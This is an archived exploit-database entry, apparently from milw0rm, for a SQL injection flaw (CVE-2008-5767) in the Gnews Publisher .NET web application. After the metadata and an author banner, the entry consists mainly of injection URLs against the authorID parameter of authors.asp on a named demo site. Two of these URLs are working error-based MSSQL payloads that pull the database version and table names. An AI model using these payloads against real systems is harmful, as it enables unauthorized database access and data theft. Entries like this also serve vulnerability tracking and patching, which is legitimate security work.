Gnews Publisher .NET - SQL Injection

Author: AlpHaNiX
type: webapps
platform: asp
port: 
date_added: 2008-12-15  
date_updated: 2017-01-05  
verified: 1  
codes: OSVDB-50780;CVE-2008-5767  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 7495.txt  
###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Gnews Publisher
#download : null
#Demo     : http://www.gazatem.com/demos/gnews/


###########################################################################

#Exploits :

--=[SQL INJECTION]=--

http://www.gazatem.com/demos/gnews/authors.asp?authorID=(SQL)

http://www.gazatem.com/demos/gnews/authors.asp?authorID=convert(int,(select+@@version));--
http://www.gazatem.com/demos/gnews/authors.asp?authorID=convert(int,(select+top+1+table_name+from+information_schema.tables));--


#Greetz For my Best Friend Zigma

###########################################################################

# milw0rm.com [2008-12-16]